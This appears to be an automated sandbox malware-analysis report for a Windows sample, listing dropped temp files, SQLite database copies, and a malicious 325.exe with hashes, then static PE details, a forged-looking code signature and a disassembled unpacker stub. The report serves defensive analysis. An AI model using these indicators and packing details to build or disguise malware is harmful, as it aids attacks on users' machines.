MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpBE63.tmp Download File
Process:	C:\Users\user\AppData\Roaming\325.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6969712158039245
Encrypted:	false
SSDEEP:	24:zDLHcjI8IQ6sNUYzo1jfRRMF6zzC3ZzNTWx7M00:zDL4ImUYzebRR66C3Z0JMR
MD5:	31CD00400A977C512B9F1AF51F2A5F90
SHA1:	3A6B9ED88BD73091D5685A51CB4C8870315C4A81
SHA-256:	E01ADE9C56AF2361A5ADC05ADE2F5727DF1B80311A0FDC6F15B2E0FFFACC9067
SHA-512:	0521ED245FA8F46DE9502CD53F5A50B01B4E83983CC6D9DE0CF02E54D2825C1C26A748CC27E24633DA1171CE0309323235ECF7EB536D4058214D7618794CF2FA
Malicious:	false
Preview:	PWCCAWLGRESZQJYMKOMIHTZVFVPFCSAZVTKGMPWIGSDMTLFZQLHJERDPYZCJGFCRLISWNBAMIMDXCWDVGVLWLRBEVYOOPHYWACKPZXSURGSIFWTFUJKLSAQNAJEWDLUIKFHXLUAMUDGRAVFMICAHEZBIIEGWGAVVJHMHSIBGNLEHYVSOKQMYABDYCPEBOGBMYUCIGVRGYYQRAYNYHAIBMHOTRIZLLYBECMXTCFUOVXXHSEMIUWSBDHOZIZZUXFTLKXXNEMXBKLCQDPKVZNOMDYUYJRWCVILZVJDNNBMPTNOFSKRQTILJRXTKDNUIYSQCAOPCQKTXYXPPGZDZOQYLGYFPFIWNBSQZXYABPTNBJQNBZEETJSFXZNHXBRWUHOMCZAGZQJLNPMZFALBBPHBIXZHLBTBJLTUHPUYVUDWDFJANSIIDJVMUYLPZPYGAJWMTOHGILQWHKJDQUWMTSWIBVVZGAHCNWIFZNGNERRKMSIVXWXEXRZZEWYASCIYJYCOOBWRTNZELPWKFVZKZIBGQBLGCTSTNAJSWPHYJCQSYZVFRYFSRAVVXJIOHQCNVEOIMWPEAVCJLBHRUKDHJWPFMXAKTZVQCOUKYCBZFWBREKKHOHZVNMMJZGWIZEYRAIKTHMJRCWVWKNMJNSZHSDRUZSQOJKCTOSNGKOKEAWUIQNIYHWKIIDHKQIJWCSGRRLEVUTENXSNNVDVYDJTIWYNCAZIEBXMIROLIBTLMGEUOCECFFWLENTJSVHFKQHKAPBXQAJJSUOUSFCBQTHCFYZGSVVAUPLQELRWLXRCZSUSFUBCORCWMJPUNHTEEYODSFGJFTDZLLXMQYMIHIZXOYGABIAWYSBWLAJSCKBWGJBVMMJKBKLUHULJIUHQXIXESAUTNVVZNKMIVIOHPPQAWTQSEHTQMIWNPRZRETXZHRGWOTGIEHCCSGIUCKCIFCQPTAJOFCIMYSMCOPGASEEYCNQLXCNRAPQUSQXTWPKPYCQXPE

C:\Users\user\AppData\Local\Temp\tmpBE64.tmp Download File
Process:	C:\Users\user\AppData\Roaming\325.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702247102869977
Encrypted:	false
SSDEEP:	24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
MD5:	B734D7226D90E4FD8228EE89C7DD26DA
SHA1:	EDA7F371036A56A0DE687FF97B01F355C5060846
SHA-256:	ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
SHA-512:	D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
Malicious:	false
Preview:	QCFWYSKMHARLAFTMDAYCDPDNVLLXYAHYJQVDDKWMWZXTODMVQHOWYAKZGPKJEHLDEADLWAOYFHCRBONQYOLNJKXLXXPSVNNBUMGSSHSRYIKKLNWBJSSZQFZBFWIPYYALBWYXPUCHCBPPPRVICZHAAXDBSBDAFSJSLRPZCKMILDLKTZJTTJWTRDUXPIOSWYRPJKVLJAGHSGEPPERRAQLAJLIRGZPORRNBHIKYMYWHJJKNXIQOPDJPXFLFPWXDCSZYFDTACTIFVHTTSPLEYMJQGMJBZKBTPKCSRPHSAJZDKKKDYFDICXMYAQSFGBCKRXTFXXUYCXPOOHXIGGOZQXUOJXGUHUEOJLEOQQRFQRNQSWAOWAWOUVFMKBPTZVBCGRCYEHPXUWCDBHICKJYVGTNPPMEWNTSWYZNREIVBOXSICNBJXTOOMRYUPEHBVWMTIZHWLGFFTIUYFBQKZOWLOZMSGJFBUHXKMGISFGKCABOUUUQJAUODQPPYPQJGLZVADLCCGHPBEUWSDDXYCCQVTRQWCEJDTNAGHKGJTRWVAQBQJBUQWMJRXXASIQFFIUCPKMEXTJTVBDCBEYZDLKHCHQXMUBNRVRITBTYGULZYWAXVJAXNQEPONBFIAUWZCXQYHHPHZWKKUTNXAQELCSUFKXKKQLLKNVNOREOWTEVCFHSUGPNRMAPAFPTHPGPAJPOCFBZXTIYQYUSEJFOUEZDUJSRXDHTOZAMMNCCIXWLXFQZALVARMPTDBNFJAJUMFQAHUJVWMEIDRIMZQXYHMCNBVLONHTHCXFAKSQBBXFBBFYSTIWNRKGOIHMIHZKIQSYCSFIRGLYFATERWSKAZLTFNMKHFVBLMXNERMNYZHBEYHNFPIPCGHZZMBNNYITUETKSXMZHNSGROLAGIITATFDCBZCBLYQHHYFPBDWGCTQNYPHDHFBNVEJJDIVMSPKDXKQBUNSMLJDVGOKQUEVKEVEUUSGEQJDKGYLPIDXNBIPBAJRUU

C:\Users\user\AppData\Local\Temp\tmpBE65.tmp Download File
Process:	C:\Users\user\AppData\Roaming\325.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6980379859154695
Encrypted:	false
SSDEEP:	24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
MD5:	4E3F4BE1B97FA984F75F11D95B1C2602
SHA1:	C34EB2BF97AB4B0032A4BB92B9579B00514DC211
SHA-256:	59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
SHA-512:	DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
Malicious:	false
Preview:	QNCYCDFIJJXXFOBBXUZWOFUQSSNNMFYIDILWLHTAZLHLJONMCDCVNCVXWBMUFJZAFKEEPNXZDYZJCSPOAMORBEETMACWAZGGTOXJCHTDTMVBHRPTLBCYZORACSZOXJZRVMZHVEOODGKJRRYLCKUFAYOXVKWJMPRNRNPZEPQZONIUXPPIZMRKSMXAPWYEFYYMMEVAXOVEZSPBEJXENHLIHXQMWJRNUJFILZBVCHZGSXSCZDLUJYAIEMFAKMGZRGVOACZDULPMTHUOBPJBMVYTDCJXFDPUECDSDSUEAFWGDFBMYZQEFBBNQHNIAZWLZMSUFKUWZABFJATHSHQHDIAVRZTRYPZQQLMBOTPFBQKJDTMNKBJAFYFAYVOMBSWHOBUQSYEBLHEDVKQNGPPYYDHQTDNFMKYJBWQRTHICJRWSTTREOOBMYGBUCHFDYMGHVLBDKHYWLYGTEDTHOSIOSXLWGESBKVKNDNLHUVLLUBIQJIAQTVGZHJBFRBPSLHGPZGCZVLETNOSXQRRSQJBXTKDASBHEZXYVHEIZXGANNJHMIMQYHDFNNALGZYXGCPYFPYZSCSPKUMVVWIRDXSMSGEKGZNWWWVXGTXWDKSTXVLHRXFELLCWRSIFVJLOUVSMBXWSHSPQZUHHYPANCFLOAYKMMBXMIXYFORAFUEVNVTQFWGSCJZEOHRNDHLLFYLQFOZXARKDDGYWBOFNOCUJWZALYSUEUOMQHCYTBHPYEDSSAKKDECQAZIWWHOJPIMNYUNNZPDBNECENBWFCTSDYUMRCXDFCNYFVTFUUWRGBGWUGZTYCTBQVNAVSKZCNNOJNXDSQUTVJLYJMHLQJJBPEDZOTOVFCJLUVQVIEYTFNEEDHKMXTEKAIHTQBGOPUGKWWNQTAGBHAUZVKMHWVZTYKYOWJYFEGCIPREWFGAHFXDMSFOAYRDJCTSGYNSDSELZDMIXRNFGOTYBEUKLAOAVMHJKZEBGSCQHGCDZCAAGIVBGWEQA

C:\Users\user\AppData\Local\Temp\tmpBE66.tmp Download File
Process:	C:\Users\user\AppData\Roaming\325.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6969712158039245
Encrypted:	false
SSDEEP:	24:zDLHcjI8IQ6sNUYzo1jfRRMF6zzC3ZzNTWx7M00:zDL4ImUYzebRR66C3Z0JMR
MD5:	31CD00400A977C512B9F1AF51F2A5F90
SHA1:	3A6B9ED88BD73091D5685A51CB4C8870315C4A81
SHA-256:	E01ADE9C56AF2361A5ADC05ADE2F5727DF1B80311A0FDC6F15B2E0FFFACC9067
SHA-512:	0521ED245FA8F46DE9502CD53F5A50B01B4E83983CC6D9DE0CF02E54D2825C1C26A748CC27E24633DA1171CE0309323235ECF7EB536D4058214D7618794CF2FA
Malicious:	false
Preview:	PWCCAWLGRESZQJYMKOMIHTZVFVPFCSAZVTKGMPWIGSDMTLFZQLHJERDPYZCJGFCRLISWNBAMIMDXCWDVGVLWLRBEVYOOPHYWACKPZXSURGSIFWTFUJKLSAQNAJEWDLUIKFHXLUAMUDGRAVFMICAHEZBIIEGWGAVVJHMHSIBGNLEHYVSOKQMYABDYCPEBOGBMYUCIGVRGYYQRAYNYHAIBMHOTRIZLLYBECMXTCFUOVXXHSEMIUWSBDHOZIZZUXFTLKXXNEMXBKLCQDPKVZNOMDYUYJRWCVILZVJDNNBMPTNOFSKRQTILJRXTKDNUIYSQCAOPCQKTXYXPPGZDZOQYLGYFPFIWNBSQZXYABPTNBJQNBZEETJSFXZNHXBRWUHOMCZAGZQJLNPMZFALBBPHBIXZHLBTBJLTUHPUYVUDWDFJANSIIDJVMUYLPZPYGAJWMTOHGILQWHKJDQUWMTSWIBVVZGAHCNWIFZNGNERRKMSIVXWXEXRZZEWYASCIYJYCOOBWRTNZELPWKFVZKZIBGQBLGCTSTNAJSWPHYJCQSYZVFRYFSRAVVXJIOHQCNVEOIMWPEAVCJLBHRUKDHJWPFMXAKTZVQCOUKYCBZFWBREKKHOHZVNMMJZGWIZEYRAIKTHMJRCWVWKNMJNSZHSDRUZSQOJKCTOSNGKOKEAWUIQNIYHWKIIDHKQIJWCSGRRLEVUTENXSNNVDVYDJTIWYNCAZIEBXMIROLIBTLMGEUOCECFFWLENTJSVHFKQHKAPBXQAJJSUOUSFCBQTHCFYZGSVVAUPLQELRWLXRCZSUSFUBCORCWMJPUNHTEEYODSFGJFTDZLLXMQYMIHIZXOYGABIAWYSBWLAJSCKBWGJBVMMJKBKLUHULJIUHQXIXESAUTNVVZNKMIVIOHPPQAWTQSEHTQMIWNPRZRETXZHRGWOTGIEHCCSGIUCKCIFCQPTAJOFCIMYSMCOPGASEEYCNQLXCNRAPQUSQXTWPKPYCQXPE

C:\Users\user\AppData\Local\Temp\tmpBE67.tmp Download File
Process:	C:\Users\user\AppData\Roaming\325.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702247102869977
Encrypted:	false
SSDEEP:	24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
MD5:	B734D7226D90E4FD8228EE89C7DD26DA
SHA1:	EDA7F371036A56A0DE687FF97B01F355C5060846
SHA-256:	ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
SHA-512:	D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
Malicious:	false
Preview:	QCFWYSKMHARLAFTMDAYCDPDNVLLXYAHYJQVDDKWMWZXTODMVQHOWYAKZGPKJEHLDEADLWAOYFHCRBONQYOLNJKXLXXPSVNNBUMGSSHSRYIKKLNWBJSSZQFZBFWIPYYALBWYXPUCHCBPPPRVICZHAAXDBSBDAFSJSLRPZCKMILDLKTZJTTJWTRDUXPIOSWYRPJKVLJAGHSGEPPERRAQLAJLIRGZPORRNBHIKYMYWHJJKNXIQOPDJPXFLFPWXDCSZYFDTACTIFVHTTSPLEYMJQGMJBZKBTPKCSRPHSAJZDKKKDYFDICXMYAQSFGBCKRXTFXXUYCXPOOHXIGGOZQXUOJXGUHUEOJLEOQQRFQRNQSWAOWAWOUVFMKBPTZVBCGRCYEHPXUWCDBHICKJYVGTNPPMEWNTSWYZNREIVBOXSICNBJXTOOMRYUPEHBVWMTIZHWLGFFTIUYFBQKZOWLOZMSGJFBUHXKMGISFGKCABOUUUQJAUODQPPYPQJGLZVADLCCGHPBEUWSDDXYCCQVTRQWCEJDTNAGHKGJTRWVAQBQJBUQWMJRXXASIQFFIUCPKMEXTJTVBDCBEYZDLKHCHQXMUBNRVRITBTYGULZYWAXVJAXNQEPONBFIAUWZCXQYHHPHZWKKUTNXAQELCSUFKXKKQLLKNVNOREOWTEVCFHSUGPNRMAPAFPTHPGPAJPOCFBZXTIYQYUSEJFOUEZDUJSRXDHTOZAMMNCCIXWLXFQZALVARMPTDBNFJAJUMFQAHUJVWMEIDRIMZQXYHMCNBVLONHTHCXFAKSQBBXFBBFYSTIWNRKGOIHMIHZKIQSYCSFIRGLYFATERWSKAZLTFNMKHFVBLMXNERMNYZHBEYHNFPIPCGHZZMBNNYITUETKSXMZHNSGROLAGIITATFDCBZCBLYQHHYFPBDWGCTQNYPHDHFBNVEJJDIVMSPKDXKQBUNSMLJDVGOKQUEVKEVEUUSGEQJDKGYLPIDXNBIPBAJRUU

C:\Users\user\AppData\Local\Temp\tmpBE68.tmp Download File
Process:	C:\Users\user\AppData\Roaming\325.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6980379859154695
Encrypted:	false
SSDEEP:	24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
MD5:	4E3F4BE1B97FA984F75F11D95B1C2602
SHA1:	C34EB2BF97AB4B0032A4BB92B9579B00514DC211
SHA-256:	59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
SHA-512:	DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
Malicious:	false
Preview:	QNCYCDFIJJXXFOBBXUZWOFUQSSNNMFYIDILWLHTAZLHLJONMCDCVNCVXWBMUFJZAFKEEPNXZDYZJCSPOAMORBEETMACWAZGGTOXJCHTDTMVBHRPTLBCYZORACSZOXJZRVMZHVEOODGKJRRYLCKUFAYOXVKWJMPRNRNPZEPQZONIUXPPIZMRKSMXAPWYEFYYMMEVAXOVEZSPBEJXENHLIHXQMWJRNUJFILZBVCHZGSXSCZDLUJYAIEMFAKMGZRGVOACZDULPMTHUOBPJBMVYTDCJXFDPUECDSDSUEAFWGDFBMYZQEFBBNQHNIAZWLZMSUFKUWZABFJATHSHQHDIAVRZTRYPZQQLMBOTPFBQKJDTMNKBJAFYFAYVOMBSWHOBUQSYEBLHEDVKQNGPPYYDHQTDNFMKYJBWQRTHICJRWSTTREOOBMYGBUCHFDYMGHVLBDKHYWLYGTEDTHOSIOSXLWGESBKVKNDNLHUVLLUBIQJIAQTVGZHJBFRBPSLHGPZGCZVLETNOSXQRRSQJBXTKDASBHEZXYVHEIZXGANNJHMIMQYHDFNNALGZYXGCPYFPYZSCSPKUMVVWIRDXSMSGEKGZNWWWVXGTXWDKSTXVLHRXFELLCWRSIFVJLOUVSMBXWSHSPQZUHHYPANCFLOAYKMMBXMIXYFORAFUEVNVTQFWGSCJZEOHRNDHLLFYLQFOZXARKDDGYWBOFNOCUJWZALYSUEUOMQHCYTBHPYEDSSAKKDECQAZIWWHOJPIMNYUNNZPDBNECENBWFCTSDYUMRCXDFCNYFVTFUUWRGBGWUGZTYCTBQVNAVSKZCNNOJNXDSQUTVJLYJMHLQJJBPEDZOTOVFCJLUVQVIEYTFNEEDHKMXTEKAIHTQBGOPUGKWWNQTAGBHAUZVKMHWVZTYKYOWJYFEGCIPREWFGAHFXDMSFOAYRDJCTSGYNSDSELZDMIXRNFGOTYBEUKLAOAVMHJKZEBGSCQHGCDZCAAGIVBGWEQA

C:\Users\user\AppData\Local\Temp\tmpEAF7.tmp Download File
Process:	C:\Users\user\AppData\Roaming\325.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpEFBD.tmp Download File
Process:	C:\Users\user\AppData\Roaming\325.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpEFBE.tmp Download File
Process:	C:\Users\user\AppData\Roaming\325.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpEFBF.tmp Download File
Process:	C:\Users\user\AppData\Roaming\325.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpEFC0.tmp Download File
Process:	C:\Users\user\AppData\Roaming\325.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\325.exe Download File
Process:	C:\Users\user\Desktop\kS2dqbsDwD.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	979968
Entropy (8bit):	7.361382512565047
Encrypted:	false
SSDEEP:	12288:cGRXJBEsyGeV5qLHKK1QK1MuSUqMidk++KANTbCPpUlmLXIRE:T9JB8rWHKK131MuadkJK4qrXIW
MD5:	523AC177BFB4FB64A20B60FC0CE3E0E3
SHA1:	BB965F2D97B19ED01702B8182BBD870670A1E75B
SHA-256:	20E702B077D7CF9780192671268C321BB0A76BAEC0A731413A1F04F735EEDCE3
SHA-512:	BD6C23385D7B914AD9A423D71DF9FA33BA917BA696270DF1435D90DE24B7B1286A7263FD10A027C17C41A899E5667F4481C83B385931ECCD244AEA7971D519F2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 33%
Joe Sandbox View:	Filename: Nb2HQZZDIf.exe, Detection: malicious, Browse Filename: P58w6OezJY.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`................."...........@... ...`....@.. ....................................@.................................P@..K.......0....................`....................................................... ............... ..H............text.... ... ...".................. ..`.sdata.. ....`.......&..............@....rsrc...0............(..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\field Download File
Process:	C:\Users\user\Desktop\kS2dqbsDwD.exe
File Type:	PNG image data, 1 x 1, 1-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	116
Entropy (8bit):	4.529003957966892
Encrypted:	false
SSDEEP:	3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/09h/rywOhSllln+wbp:6v/lhPfkCDtmywFghK9hm9Wlln+Yp
MD5:	EC6AAE2BB7D8781226EA61ADCA8F0586
SHA1:	D82B3BAD240F263C1B887C7C0CC4C2FF0E86DFE3
SHA-256:	B02FFFABA9E664FF7840C82B102D6851EC0BB148CEC462CEF40999545309E599
SHA-512:	AA62A8CD02A03E4F462F76AE6FF2E43849052CE77CCA3A2CCF593F6669425830D0910AFAC3CF2C46DD385454A6FB3B4BD604AE13B9586087D6F22DE644F9DFC7
Malicious:	false
Preview:	.PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....pHYs..........+......IDAT..c`.......qd.....IEND.B`.

Static File Info

General
File type:	MS-DOS executable, MZ for MS-DOS
Entropy (8bit):	7.218310131625728
TrID:	Win64 Executable (generic) (12005/4) 74.95% Generic Win/DOS Executable (2004/3) 12.51% DOS Executable Generic (2002/1) 12.50% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name:	kS2dqbsDwD.exe
File size:	598944
MD5:	888ab99280a081717ec5c5749266d1bd
SHA1:	3a071aeadd42c1232ff2878d2adf7f1e4a629180
SHA256:	e726f2014db779e3605f60499f84676ceb45160c6d092bedfa115f7e09d693e8
SHA512:	85b78c1489ed6a8fd375380595f3597968d026de0bd0cfe58e26cd4d6590f1d171626c0a8f677cc71d7405e5e647ede4692e615fd63a63597db724da15dc2299
SSDEEP:	12288:67iuUvUF2JURoyPa5UA5/zfqb3HtwQG99:67iuUv8Paz/2ZwJ99
File Content Preview:	MZ@.....................................!..L.!Win64 .EXE...$@...PE..d....4.V..........#.................R..........@.......................................... ...@.................................................X............p..4_.......'.................

File Icon


Icon Hash:	d2ae86929a86a2c2

Static PE Info

General
Entrypoint:	0x14013c352
Entrypoint Section:	.MPRESS2
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	HIGH_ENTROPY_VA
Time Stamp:	0x56F734A2 [Sun Mar 27 01:17:22 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	caa5e6a2892587c2324418efee31c648

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Sectigo RSA Code Signing CA, O=Sectigo Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	5/22/2019 5:00:00 PM 5/23/2023 4:59:59 PM
Subject Chain	CN=Sublime HQ Pty Ltd, O=Sublime HQ Pty Ltd, STREET=Suite 102, STREET=377 New South Head Rd, L=Doubte Bay, S=NSW, PostalCode=2028, C=AU
Version:	3
Thumbprint MD5:	A32549731E28A0F6BA85C9B2C50FE589
Thumbprint SHA-1:	834F29A60152CE36EB54AF37CA5F8EC029ECCF01
Thumbprint SHA-256:	E025B15847B86808B69C605D7FC63A186CBF1D9A4ED5A1971B2FF5F9C6F50DF0
Serial:	00972FADA2BC13FA55C5D47FEF56AEE0F4

Entrypoint Preview

Instruction
push edi
push esi
push ebx
push ecx
push edx
inc ecx
push eax
dec eax
lea eax, dword ptr [00000ADEh]
dec eax
mov esi, dword ptr [eax]
dec eax
add esi, eax
dec eax
sub eax, eax
dec eax
mov edi, esi
lodsw
shl eax, 0Ch
dec eax
mov ecx, eax
push eax
lodsd
sub ecx, eax
dec eax
add esi, ecx
mov ecx, eax
push edi
inc esp
mov eax, ecx
dec ecx
mov al, byte ptr [ecx+edi+06h]
mov byte ptr [ecx+esi], al
jne 00007F491C93DB07h
inc ecx
push ecx
push ebp
sub eax, eax
lodsb
mov ecx, eax
shr ecx, 04h
push ecx
and al, 0Fh
push eax
lodsb
mov ecx, eax
add cl, byte ptr [esp]
push eax
dec eax
mov ebp, FFFFFD00h
dec eax
shl ebp, cl
pop ecx
pop eax
dec eax
shl eax, 20h
dec eax
add ecx, eax
pop eax
dec eax
mov ebx, esp
dec eax
lea esp, dword ptr [esp+ebp*2-00000E70h]
push eax
push ecx
dec eax
sub ecx, ecx
push ecx
push ecx
dec eax
mov ecx, esp
push ecx
mov dx, word ptr [edi]
shl edx, 0Ch
push edx
push edi
dec esp
lea ecx, dword ptr [ecx+08h]
dec ecx
lea ecx, dword ptr [ecx+08h]
push esi
pop edx
dec eax
sub esp, 20h
call 00007F491C93DBDDh
dec eax
mov esp, ebx
pop ebp
inc ecx
pop ecx
pop esi
pop edx
sub edx, 00001000h
sub ecx, ecx
cmp ecx, edx
jnc 00007F491C93DB5Ch
mov ebx, ecx
lodsb
inc ecx
cmp al, FFh
jne 00007F491C93DB1Fh
mov al, byte ptr [esi]
and al, FDh
cmp al, 15h
jne 00007F491C93DAFDh
lodsb
inc ecx
jmp 00007F491C93DB29h
cmp al, 8Dh
jne 00007F491C93DB1Fh
mov al, byte ptr [esi]
and al, C7h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x13c000	0x358	.MPRESS2
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x13d000	0x2b508	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x107000	0x5f34	.MPRESS1
IMAGE_DIRECTORY_ENTRY_SECURITY	0x8fc00	0x27a0	.MPRESS1
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
